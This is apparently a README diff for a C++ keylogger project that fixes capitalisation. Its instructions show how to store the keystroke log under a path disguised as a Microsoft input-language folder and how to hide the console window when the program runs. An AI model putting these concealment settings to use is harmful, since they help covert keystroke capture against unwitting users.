vardhankumar7890/Cyber-Community/HarshitJoshi-CppKeyLogger/README.md

 ## Changing Functionality

-to change the log file name and path edit the following lines in `CppKeyLogger.cpp`
+To change the log file name and path edit the following lines in `CppKeyLogger.cpp`

 ```cpp
 #define LOG_LOCATION "C:\\Users\\harsj\\AppData\\Local\\Microsoft\\input\\ar-QA\\"
 #define LOG_FILENAME "lang.txt"
 ```

-change `#define PRODUCTION false` to `#define PRODUCTION true` to hide the console window when executing the exe
+Change `#define PRODUCTION false` to `#define PRODUCTION true` to hide the console window when executing the exe !

 ## Building using CMake